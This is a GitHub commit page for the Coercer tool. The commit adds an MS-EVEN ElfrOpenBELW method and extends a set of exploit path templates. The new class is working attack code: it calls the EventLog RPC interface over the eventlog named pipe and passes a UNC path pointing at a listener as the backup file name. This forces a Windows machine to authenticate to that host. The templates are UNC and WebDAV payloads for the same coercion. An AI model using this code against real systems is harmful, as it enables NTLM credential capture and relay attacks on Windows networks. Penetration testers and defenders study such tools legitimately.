Skip to content

Commit

Permalink
Added MS-EVEN::ElfrOpenBELW (CheeseOunce)
Browse files Browse the repository at this point in the history 
Fixes #14
  • Loading branch information
@p0dalirius
p0dalirius committed Dec 11, 2022
1 parent 2d8d616 commit a8fd037
Show file tree
Hide file tree
Showing 10 changed files with 80 additions and 706 deletions.
1 change: 1 addition & 0 deletions Makefile
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ docs:
@echo "[$(shell date)] Done!"

install: build
python3 -m pip uninstall coercer
python3 setup.py install

build:
Expand Down
3 changes: 2 additions & 1 deletion coercer/core/modes/coerce.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -117,7 +117,8 @@ def action_coerce(target, available_methods, options, credentials, reporter):
next_action_answer = None
while next_action_answer not in ["C","S","X"]:
next_action_answer = input("Continue (C) | Skip this function (S) | Stop exploitation (X) ? ")
next_action_answer = next_action_answer.strip()[0].upper()
if len(next_action_answer) > 0:
next_action_answer = next_action_answer.strip()[0].upper()
if next_action_answer == "C":
pass
elif next_action_answer == "S":
Expand Down
7 changes: 6 additions & 1 deletion coercer/core/modes/fuzz.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -107,7 +107,12 @@ def action_fuzz(target, available_methods, options, credentials, reporter):
continue
if listener_type == "http":
http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
exploitpath = generate_exploit_path_from_template(template=exploitpath, listener=listening_ip, port=http_listen_port)
exploitpath = generate_exploit_path_from_template(
template=exploitpath,
listener=listening_ip,
http_listen_port=http_listen_port,
smb_listen_port=options.smb_port
)

msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
dcerpc = DCERPCSession(credentials=credentials, verbose=True)
Expand Down
10 changes: 8 additions & 2 deletions coercer/core/utils.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -47,19 +47,25 @@ def generate_exploit_templates(desired_auth_type=None):
("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
# UNC path with ??
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
# UNC path with .
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),

# HTTP
("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\x00')
]

if add_uncommon_tests:
Expand Down
63 changes: 63 additions & 0 deletions coercer/methods/MS_EVEN/ElfrOpenBELW.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : ElfrOpenBELW.py
# Author : Podalirius (@podalirius_)
# Date created : 11 Dec 2022


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5 import even
from impacket.dcerpc.v5.dtypes import NULL


class ElfrOpenBELW(MSPROTOCOLRPCCALL):
"""
Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
Method found by:
- [@evilashz](https://github.com/evilashz/)
"""

exploit_paths = [
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
]

access = {
"ncan_np": [
{
"namedpipe": r"\PIPE\eventlog",
"uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
"version": "0.0"
}
]
}

protocol = {
"longname": "[MS-EVEN]: EventLog Remoting Protocol",
"shortname": "MS-EVEN"
}

function = {
"name": "ElfrOpenBELW",
"opnum": 9,
"vulnerable_arguments": ["BackupFileName"]
}

def trigger(self, dcerpc_session, target):
if dcerpc_session is not None:
try:
self.path = self.path.rstrip('\x00')
request = even.ElfrOpenBELW()
request['UNCServerName'] = NULL
request['BackupFileName'] = self.path
request['MajorVersion'] = 1
request['MinorVersion'] = 1
resp = dcerpc_session.request(request)
resp.dump()
return ""
except Exception as err:
return err
else:
print("[!] Error: dce is None, you must call connect() first.")
return None
0 coercer/protocols/__init__.py → coercer/methods/MS_EVEN/__init__.py
View file
File renamed without changes.
142 changes: 0 additions & 142 deletions coercer/protocols/MS_DFSNM.py
View file

This file was deleted.

Loading

0 comments on commit a8fd037

Please # to comment.